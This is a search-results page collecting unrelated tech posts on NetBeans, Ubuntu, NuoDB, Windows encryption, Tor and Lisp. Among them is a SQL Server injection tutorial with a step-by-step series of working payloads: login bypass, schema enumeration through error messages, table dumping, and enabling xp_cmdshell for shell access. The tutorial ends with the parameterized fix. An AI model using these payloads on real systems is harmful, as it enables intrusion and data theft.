Search Results

Search found 35462 results on 1419 pages for 'start bar'.

Page 29/1419 | < Previous Page | 25 26 27 28 29 30 31 32 33 34 35 36  | Next Page >

  • Netbeans doesn't start, Java fatal error, unless sudo

    - by elect
    Fresh 13.10 64b Openjdk 6 is there, I just installed Netbeans 7.01 from the repo, but it doesn't work, I open then a console elect@elect-desktop:~$ netbeans # # A fatal error has been detected by the Java Runtime Environment: # # SIGSEGV (0xb) at pc=0x00007faebdf79325, pid=5251, tid=140388628424448 # # JRE version: 6.0_27-b27 # Java VM: OpenJDK 64-Bit Server VM (20.0-b12 mixed mode linux-amd64 compressed oops) # Derivative: IcedTea6 1.12.6 # Distribution: Ubuntu Saucy Salamander (development branch), package 6b27-1.12.6-1ubuntu2 # Problematic frame: # C [libgobject-2.0.so.0+0x14325] g_cclosure_marshal_BOOLEAN__BOXED_BOXEDv+0x985 # # An error report file with more information is saved as: # /home/elect/hs_err_pid5251.log [thread 140386948781824 also had an error] # # If you would like to submit a bug report, please include # instructions how to reproduce the bug and visit: # https://bugs.launchpad.net/ubuntu/+source/openjdk-6/ # /usr/share/netbeans/7.0.1/bin/../platform/lib/nbexec: line 548: 5251 Aborted (core dumped) "/usr/lib/jvm/java-6-openjdk-amd64/bin/java" -Djdk.home="/usr/lib/jvm/java-6-openjdk-amd64" -Djava.library.path=/usr/lib/jni -classpath "/usr/share/netbeans/7.0.1/platform/lib/boot.jar:/usr/share/netbeans/7.0.1/platform/lib/org-openide-modules.jar:/usr/share/netbeans/7.0.1/platform/lib/org-openide-util.jar:/usr/share/netbeans/7.0.1/platform/lib/org-openide-util-lookup.jar:/usr/lib/jvm/java-6-openjdk-amd64/lib/dt.jar:/usr/lib/jvm/java-6-openjdk-amd64/lib/tools.jar" -Dnetbeans.system_http_proxy="DIRECT" -Dnetbeans.system_http_non_proxy_hosts="" -Dnetbeans.dirs="/usr/share/netbeans/7.0.1/nb:/usr/share/netbeans/7.0.1/bin/../ergonomics:/usr/share/netbeans/7.0.1/ide:/usr/share/netbeans/7.0.1/java:/usr/share/netbeans/7.0.1/bin/../xml:/usr/share/netbeans/7.0.1/apisupport:/usr/share/netbeans/7.0.1/bin/../webcommon:/usr/share/netbeans/7.0.1/bin/../websvccommon:/usr/share/netbeans/7.0.1/bin/../enterprise:/usr/share/netbeans/7.0.1/bin/../mobility:/usr/share/netbeans/7.0.1/bin/../profiler:/usr/share/netbeans/7.0.1/bin/../ruby:/usr/share/netbeans/7.0.1/bin/../python:/usr/share/netbeans/7.0.1/bin/../php:/usr/share/netbeans/7.0.1/bin/../visualweb:/usr/share/netbeans/7.0.1/bin/../soa:/usr/share/netbeans/7.0.1/bin/../identity:/usr/share/netbeans/7.0.1/bin/../uml:/usr/share/netbeans/7.0.1/harness:/usr/share/netbeans/7.0.1/bin/../cnd:/usr/share/netbeans/7.0.1/bin/../dlight:/usr/share/netbeans/7.0.1/bin/../groovy:/usr/share/netbeans/7.0.1/bin/../extra:/usr/share/netbeans/7.0.1/bin/../javafx:/usr/share/netbeans/7.0.1/bin/../javacard:" -Dnetbeans.home="/usr/share/netbeans/7.0.1/platform" '-Dnetbeans.importclass=org.netbeans.upgrade.AutoUpgrade' '-Dnetbeans.accept_license_class=org.netbeans.license.AcceptLicense' '-XX:MaxPermSize=384m' '-Xmx768m' '-client' '-Xss2m' '-Xms32m' '-XX:PermSize=32m' '-Dapple.laf.useScreenMenuBar=true' '-Dapple.awt.graphics.UseQuartz=true' '-Dsun.java2d.noddraw=true' '-Dsun.java2d.pmoffscreen=false' -XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath="/home/elect/.netbeans/7.0/var/log/heapdump.hprof" org.netbeans.Main --userdir "/home/elect/.netbeans/7.0" "--branding" "nb" 0<&0 Looking around, the second answer, here Vigintas Labakojis, points out something regarding permission, I just try sudo netbeans, it works.. Then I look for the ~/.cache/netbeans/ I dont have, I have instead ~/.netbeans/ Then I run his commands on those folder, it doesn't work.. It must be something else, do you have any idea? In any case, my log /home/elect/hs_err_pid5251.log is here

    Read the article

  • Exception:Cannot Start your application.The Workgroup information file is missing or opened exclusiv

    - by Jeev
    We were getting this error when trying   to connect  to a password protected access file. This is what the connection string looked likestring conString =@"Provider=Microsoft.Jet.OLEDB.4.0;Data Source="Path to your access file";User Id=;Password=password";To fix the issue this is what we didstring conString =@"Provider=Microsoft.Jet.OLEDB.4.0;Data Source="Path to your access file";Jet OLEDB:Database Password=password";  We removed the User id and changed the password to Jet OLEDB:Database Password Hope this helps someone   

    Read the article

  • My fresh installed ubuntu 12,4 won´t start without live usb drive

    - by Alexander Neira
    I just installed a fresh copy of ubuntu 12,04 in my netbook, through a live USB drive. I used the whole HDD and erased an existent win 7 partition. It installed everything and then asked me to reboot. When I did that, after rebooting, it only appeared the writer marker on top of a black screen and only that. Then, i plugged in again my usb drive and reboot. It loaded, but in the loading screen sent me (once) an error about the hard drive, that some file was missing (sorry i coulnd't write down the exact message). After that, I tried to re install ubuntu using my USB drive, but it sends me inmediately to the login screen. How do I solve this?

    Read the article

  • Project Server 2007 install issue - ProjectEventService won't start

    - by Brian Meinertz
    Trying to install PS2007 with SP1 on Server 2003. The install goes fine, but when running the SharePoint Configuration Wizard, it fails at stage 6 of 12 with the error: Failed to register SharePoint Services. An exception of type System.InvalidOperationException was thrown. Additional exception information: Cannot start service ProjectEventService on computer '.'. From the PSCDiagnostics log: Exception: System.InvalidOperationException: Cannot start service ProjectEventService on computer '.'. --- System.ComponentModel.Win32Exception: The service did not respond to the start or control request in a timely fashion. The ProjectEventService (Microsoft Office Project Server Event) won't even start manually using the Network Service account. Starting the service with a domain account works, but subsequently running the Config Wizard causes the service to be removed and re-provisioned to run using the Network Service account, which again fails. Presumably Network Service needs elevated permissions, but even adding it to the local Admin group makes no difference. Anyone come across this sort of issue before?

    Read the article

  • SQL – Quick Start with Explorer Sections of NuoDB – Query NuoDB Database

    - by Pinal Dave
    This is the third post in the series of the blog posts I am writing about NuoDB. NuoDB is very innovative and easy-to-use product. I can clearly see how one can scale-out NuoDB with so much ease and confidence. In my very first blog post we discussed how we can install NuoDB (link), and in my second post I discussed how we can manage the NuoDB database transaction engines and storage managers with a few clicks (link). Note: You can Download NuoDB from here. In this post, we will learn how we can use the Explorer feature of NuoDB to do various SQL operations. NuoDB has a browser-based Explorer, which is very powerful and has many of the features any IDE would normally have. Let us see how it works in the following step-by-step tutorial. Let us go to the NuoDBNuoDB Console by typing the following URL in your browser: http://localhost:8080/ It will bring you to the QuickStart screen. Make sure that you have created the sample database. If you have not created sample database, click on Create Database and create it successfully. Now go to the NuoDB Explorer by clicking on the main tab, and it will ask you for your domain username and password. Enter the username as a domain and password as a bird. Alternatively you can also enter username as a quickstart and password as a quickstart. Once you enter the password you will be able to see the databases. In our example we have installed the Sample Database hence you will see the Test database in our Database Hierarchy screen. When you click on database it will ask for the database login. Note that Database Login is different from Domain login and you will have to enter your database login over here. In our case the database username is dba and password is goalie. Once you enter a valid username and password it will display your database. Further expand your database and you will notice various objects in your database. Once you explore various objects, select any database and click on Open. When you click on execute, it will display the SQL script to select the data from the table. The autogenerated script displays entire result set from the database. The NuoDB Explorer is very powerful and makes the life of developers very easy. If you click on List SQL Statements it will list all the available SQL statements right away in Query Editor. You can see the popup window in following image. Here is the cool thing for geeks. You can even click on Query Plan and it will display the text based query plan as well. In case of a SELECT, the query plan will be much simpler, however, when we write complex queries it will be very interesting. We can use the query plan tab for performance tuning of the database. Here is another feature, when we click on List Tables in NuoDB Explorer.  It lists all the available tables in the query editor. This is very helpful when we are writing a long complex query. Here is a relatively complex example I have built using Inner Join syntax. Right below I have displayed the Query Plan. The query plan displays all the little details related to the query. Well, we just wrote multi-table query and executed it against the NuoDB database. You can use the NuoDB Admin section and do various analyses of the query and its performance. NuoDB is a distributed database built on a patented emergent architecture with full support for SQL and ACID guarantees.  It allows you to add Transaction Engine processes to a running system to improve the performance of your system.  You can also add a second Storage Engine to your running system for redundancy purposes.  Conversely, you can shut down processes when you don’t need the extra database resources. NuoDB also provides developers and administrators with a single intuitive interface for centrally monitoring deployments. If you have read my blog posts and have not tried out NuoDB, I strongly suggest that you download it today and catch up with the learnings with me. Trust me though the product is very powerful, it is extremely easy to learn and use. Reference: Pinal Dave (http://blog.sqlauthority.com)   Filed under: Big Data, PostADay, SQL, SQL Authority, SQL Query, SQL Server, SQL Tips and Tricks, T SQL, Technology Tagged: NuoDB

    Read the article

  • GlassFish will not start when SNMP is enabled

    - by edarc
    I have a GlassFish v3 app server running on 64-bit Debian Lenny. Everything is running fine, except I would like to monitor GF's JVM instance with SNMP. However, every time I try to enable it by adding the following <jvm-options> in domain.xml: -Dcom.sun.management.snmp.port=10161 -Dcom.sun.management.snmp.acl.file=/path/to/snmp.acl -Dcom.sun.management.snmp.interface=127.0.0.1 GlassFish refuses to start: $ asadmin start-domain Waiting for DAS to start .Error starting domain: default. The server exited prematurely with exit code 1. Command start-domain failed. $ There is also nothing illuminating (well, really nothing at all) in jvm.log or server.log. The snmp.acl file contains: acl = { { communities = public access = read-only managers = localhost } } and is chmod 600 (I know this is not the problem because it will actually fail with an error about the permissions if it is set to anything other than 600) $ java -version java version "1.6.0_0" OpenJDK Runtime Environment (build 1.6.0_0-b11) OpenJDK 64-Bit Server VM (build 1.6.0_0-b11, mixed mode)

    Read the article

  • Best way to start in C# and Raknet?

    - by cad
    I am trying to learn Raknet from C# and I found it extremely confusing. Raknet tutorial seems to work easy and nice in C++. I have already make some chat server code from tutorial. But I am looking to do something similar in C# and I find a mess. - Seems that I need to compile raknet using SWIG to have like an interface? - Also I have found a project called raknetdotnet but seems abandoned..(http://code.google.com/p/raknetdotnet/) So my main question is what is the best way to code in C# using raknet? As secondary questions: Anyone can recomend me good tutorial in raknet AND c#? Is there any sample C# code that I can download? I have readed lot of pages but I didn't get anything clear so I hope someone that has lived this before can help me. Thanks PD: Maybe raknet is obsolete (I find a lot of code and posts from 2007) and there is a better tool to achieve what I want. (I am interested in making a game with a dedicated server.)

    Read the article

  • Speed-start your Linux App: Using DB2 and the DB2 Control Center

    This article guides you through setting up and using IBM DB2 7.2 with the Command Line Processor. You'll also learn to use the graphical Control Center, which helps you explore and control your databases, and the graphical Command Center, which helps you generate SQL queries. Other topics covered include Java runtime environment setup, useful Linux utility functions, and bash profile customization.

    Read the article

  • Windows 8.1 Will Start Encrypting Hard Drives By Default: Everything You Need to Know

    - by Chris Hoffman
    Windows 8.1 will automatically encrypt the storage on modern Windows PCs. This will help protect your files in case someone steals your laptop and tries to get at them, but it has important ramifications for data recovery. Previously, “BitLocker” was available on Professional and Enterprise editions of Windows, while “Device Encryption” was available on Windows RT and Windows Phone. Device encryption is included with all editions of Windows 8.1 — and it’s on by default. When Your Hard Drive Will Be Encrypted Windows 8.1 includes “Pervasive Device Encryption.” This works a bit differently from the standard BitLocker feature that has been included in Professional, Enterprise, and Ultimate editions of Windows for the past few versions. Before Windows 8.1 automatically enables Device Encryption, the following must be true: The Windows device “must support connected standby and meet the Windows Hardware Certification Kit (HCK) requirements for TPM and SecureBoot on ConnectedStandby systems.”  (Source) Older Windows PCs won’t support this feature, while new Windows 8.1 devices you pick up will have this feature enabled by default. When Windows 8.1 installs cleanly and the computer is prepared, device encryption is “initialized” on the system drive and other internal drives. Windows uses a clear key at this point, which is removed later when the recovery key is successfully backed up. The PC’s user must log in with a Microsoft account with administrator privileges or join the PC to a domain. If a Microsoft account is used, a recovery key will be backed up to Microsoft’s servers and encryption will be enabled. If a domain account is used, a recovery key will be backed up to Active Directory Domain Services and encryption will be enabled. If you have an older Windows computer that you’ve upgraded to Windows 8.1, it may not support Device Encryption. If you log in with a local user account, Device Encryption won’t be enabled. If you upgrade your Windows 8 device to Windows 8.1, you’ll need to enable device encryption, as it’s off by default when upgrading. Recovering An Encrypted Hard Drive Device encryption means that a thief can’t just pick up your laptop, insert a Linux live CD or Windows installer disc, and boot the alternate operating system to view your files without knowing your Windows password. It means that no one can just pull the hard drive from your device, connect the hard drive to another computer, and view the files. We’ve previously explained that your Windows password doesn’t actually secure your files. With Windows 8.1, average Windows users will finally be protected with encryption by default. However, there’s a problem — if you forget your password and are unable to log in, you’d also be unable to recover your files. This is likely why encryption is only enabled when a user logs in with a Microsoft account (or connects to a domain). Microsoft holds a recovery key, so you can gain access to your files by going through a recovery process. As long as you’re able to authenticate using your Microsoft account credentials — for example, by receiving an SMS message on the cell phone number connected to your Microsoft account — you’ll be able to recover your encrypted data. With Windows 8.1, it’s more important than ever to configure your Microsoft account’s security settings and recovery methods so you’ll be able to recover your files if you ever get locked out of your Microsoft account. Microsoft does hold the recovery key and would be capable of providing it to law enforcement if it was requested, which is certainly a legitimate concern in the age of PRISM. However, this encryption still provides protection from thieves picking up your hard drive and digging through your personal or business files. If you’re worried about a government or a determined thief who’s capable of gaining access to your Microsoft account, you’ll want to encrypt your hard drive with software that doesn’t upload a copy of your recovery key to the Internet, such as TrueCrypt. How to Disable Device Encryption There should be no real reason to disable device encryption. If nothing else, it’s a useful feature that will hopefully protect sensitive data in the real world where people — and even businesses — don’t enable encryption on their own. As encryption is only enabled on devices with the appropriate hardware and will be enabled by default, Microsoft has hopefully ensured that users won’t see noticeable slow-downs in performance. Encryption adds some overhead, but the overhead can hopefully be handled by dedicated hardware. If you’d like to enable a different encryption solution or just disable encryption entirely, you can control this yourself. To do so, open the PC settings app — swipe in from the right edge of the screen or press Windows Key + C, click the Settings icon, and select Change PC settings. Navigate to PC and devices -> PC info. At the bottom of the PC info pane, you’ll see a Device Encryption section. Select Turn Off if you want to disable device encryption, or select Turn On if you want to enable it — users upgrading from Windows 8 will have to enable it manually in this way. Note that Device Encryption can’t be disabled on Windows RT devices, such as Microsoft’s Surface RT and Surface 2. If you don’t see the Device Encryption section in this window, you’re likely using an older device that doesn’t meet the requirements and thus doesn’t support Device Encryption. For example, our Windows 8.1 virtual machine doesn’t offer Device Encryption configuration options. This is the new normal for Windows PCs, tablets, and devices in general. Where files on typical PCs were once ripe for easy access by thieves, Windows PCs are now encrypted by default and recovery keys are sent to Microsoft’s servers for safe keeping. This last part may be a bit creepy, but it’s easy to imagine average users forgetting their passwords — they’d be very upset if they lost all their files because they had to reset their passwords. It’s also an improvement over Windows PCs being completely unprotected by default.     

    Read the article

  • upstart config to start sync daemon as non-root user

    - by Rudiger Wolf
    I am planning to use inosync to sync data from master server to several client servers. I have created a user called rsyncuser in both master and slaves with access permissions and passwordless ssh access from master to slave servers. Inosync is working when I use it from the command line as rsyncuser. Next I want this to start automatically when server is turned on. I figured upstart is the way to get this working. I am unable to find the right upstart command to get this working. Here is my upstart conf file. The problem seems to be around running "inosync -d -c /etc/inosync/inosync_rsyncuser.py" as a given user. As you can see I have tried a number of various options! description "start inosync to sync data to other CDN Servers as rsyncuser" console output #start on startup #stop on shutdown start on (net-device-up and local-filesystems) stop on runlevel [016] #start on runlevel [2345] #stop on runlevel [!2345] #kill timeout 30 env RUN_AS_USER=rsyncuser expect fork script echo "Inosync updtart job seems to have started" /tmp/upstart.log # exec sudo -u rsyncuser -c "ls -la" /tmp/upstart.log 2&1 # LOGFILE=/var/log/logfile.`date +%Y-%m-%d`.log # exec su - $RUN_AS_USER -c "inosync -d -c /etc/inosync/inosync_rsyncuser.py" $LOGFILE 2&1 # exec su -c "ls -la" /tmp/upstart.log 2&1 # emit inosync_running end script

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • Cannot start tor with vidalia, failed to bind listening port because of tor-socks running

    - by ganjan
    I get these errors trying to run tor with vidalia Apr 19 21:55:15.371 [Notice] Tor v0.2.1.30. This is experimental software. Do not rely on it for strong anonymity. (Running on Linux i686) Apr 19 21:55:15.372 [Notice] Initialized libevent version 1.4.13-stable using method epoll. Good. Apr 19 21:55:15.373 [Notice] Opening Socks listener on 127.0.0.1:9050 Apr 19 21:55:15.373 [Warning] Could not bind to 127.0.0.1:9050: Address already in use. Is Tor already running? Apr 19 21:55:15.373 [Warning] Failed to parse/validate config: Failed to bind one of the listener ports. Apr 19 21:55:15.373 [Error] Reading config failed--see warnings above. I don't think tor is running. Here is a nmap scan of my localhost Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-19 21:59 CEST Nmap scan report for localhost (127.0.0.1) Host is up (0.0000050s latency). Hostname localhost resolves to 2 IPs. Only scanned 127.0.0.1 rDNS record for 127.0.0.1: localhost.localdomain Not shown: 989 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 631/tcp open ipp 3128/tcp open squid-http 3306/tcp open mysql 9000/tcp open cslistener 9050/tcp open tor-socks 10000/tcp open snet-sensor-mgmt I see tor-socks is running here, probably be the cause of the problem. How do I stop this from starting up? I want to use vidalia so I can monitor whats going on.

    Read the article

  • How should I start with Lisp?

    - by Gary Rowe
    I've been programming for years now, working my way through various iterations of Blub (BASIC, Assembler, C, C++, Visual Basic, Java, Ruby in no particular order of "Blub-ness") and I'd like to learn Lisp. However, I have a lot of intertia what with limited time (family, full time job etc) and a comfortable happiness with my current Blub (Java). So my question is this, given that I'm someone who would really like to learn Lisp, what would be the initial steps to get a good result that demonstrates the superiority of Lisp in web development? Maybe I'm missing the point, but that's how I would initially see the application of my Lisp knowledge. I'm thinking "use dialect A, use IDE B, follow instructions on page C, question your sanity after monads using counsellor D". I'd just like to know what people here consider to be an optimal set of values for A, B, C and perhaps D. Also some discussion on the relative merit of learning such a powerful language as opposed to, say, becoming a Rails expert. Just to add some more detail, I'll be developing on MacOS (or a Linux VM) - no Windows based approaches will be necessary, thanks. Notes for those just browsing by I'm going to keep this question open for a while so that I can offer feedback on the suggestions after I've been able to explore them. If you happen to be browsing by and feel you have something to add, please do. I would really welcome your feedback. Interesting links Assuming you're coming at Lisp from a Java background, this set of links will get you started quickly. Using Intellij's La Clojure plugin to integrate Lisp (videocast) Lisp for the Web Online version of Practical Common Lisp (c/o Frank Shearar) Land of Lisp a (+ (+ very quirky) game based) way in but makes it all so straightforward

    Read the article

  • PlanetQuest and the start of a new project!

    - by TATWORTH
    At the Planet Quest http://planetquest.jpl.nasa.gov/ web site there is an interesting page on the number of planets detected around other stars. There is a link to a page at http://planetquest.jpl.nasa.gov/widget.cfm for an applet to poll for this information. I downloaded the applet but had no wish to install it. Instead I viewed it in Notepad++ and found that it contacted http://planetquest.jpl.nasa.gov/atlas/xml/planetstats.cfm to get data on the latest discovery. I have amedned the CommonData project and have wrote a class in that to poll for the information. I have amended the CommonData project and have wrote a class in that to poll for the information.  That class and its unit test will form the basis for a new project.

    Read the article

  • Manually start scheduled launchd job

    - by Pascal
    On our Mac OS X (10.6) Server we have setup several backup scripts that are controlled by launchd and launched at specific times. For this we have defined StartCalendarInterval and this all works very well. Now it happens that I would like to start one of these jobs out of schedule, but this does not start the job (but also does not give an error/warning): sudo launchctl start org.job-label The manpage of launchtl states that start is intended to test on-demand jobs, no word of scheduled jobs. Is there a way to kickstart scheduled jobs?

    Read the article

  • BPM Standard Edition to start your BPM project

    - by JuergenKress
    Oracle have launched the new BPM Standard Edition. BPM Standard Edition is an entry level BPM offering designed to help organisations implement their first few processes in order to prove the value of BPM within their own organisation. Based on the highly regarded BPM Suite, BPM SE is a restricted use license that is licensed on a Named User basis. This new commercial offering gives Partners and Oracle the opportunity to address new markets and fast track adoption of Oracle BPM by starting small and proving the Return on Investment by working closely with our Customers. This is a great opportunity for Partners to use BPM SE as a core element of your own BPM ‘go to market’ value propositions. Please contact either Juergen Kress or Mike Connaughton if you would like to make these value propositions available to the Oracle Field Sales organisation and to advertise them on the EMEA BPM intranet. Click here to see the replay of webcast and download the slides here. Need BPM support? E-Mail: [email protected] Tel. 441189247673 Additional updated BPM material: Whitepaper: BPM10g Usage Guidelines - Design Practices to Facilitate Migration to BPM 12c (Partner & Oracle confidential) Article: 10 Ways to Tactical Business Success with BPM To access the documents please visit the SOA Community Workspace (SOA Community membership required) SOA & BPM Partner Community For regular information on Oracle SOA Suite become a member in the SOA & BPM Partner Community for registration please visit  www.oracle.com/goto/emea/soa (OPN account required) If you need support with your account please contact the Oracle Partner Business Center. Blog Twitter LinkedIn Mix Forum Technorati 